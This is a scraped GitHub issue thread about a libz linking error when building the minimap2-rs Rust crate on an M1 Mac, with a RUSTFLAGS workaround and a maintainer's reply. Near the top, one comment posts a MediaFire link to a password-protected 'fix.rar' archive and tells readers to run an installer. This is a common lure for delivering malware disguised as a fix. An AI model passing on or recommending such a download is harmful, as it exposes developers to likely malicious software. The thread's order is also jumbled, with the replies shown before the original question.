Open rob-p opened 2 months ago
Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."
I was able to get this to compile by manually overriding the rust flags (as below), but that shouldn’t be necessary. Any ideas why?
RUSTFLAGS=‘-C link-args=-lz’ cargo build —-release
Hmm that should be a change we can make in build.rs script for it.
I don't have a Mac to test on, but will take a stab at it soon
On Tue, 27 Aug 2024, 11:33 am Rob Patro, @.***> wrote:
I was able to get this to compile by manually overriding the rust flags (as below), but that shouldn’t be necessary. Any ideas why?
RUSTFLAGS=‘-C link-args=-lz’ cargo build —-release
— Reply to this email directly, view it on GitHub https://github.com/jguhlin/minimap2-rs/issues/81#issuecomment-2311287515, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAOA2CFJAUBPEXLGPTFS76LZTO3LDAVCNFSM6AAAAABNELLLGSVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDGMJRGI4DONJRGU . You are receiving this because you were mentioned.Message ID: @.***>
Hi @jguhlin,
I encounter the following error when attempting to include the minimap2-rs crate when building on OSX on an M1 Mac (MacOS 13.4):
Have you seen anything like this before? Any idea why the relevant libz functions might not be found?
Thanks!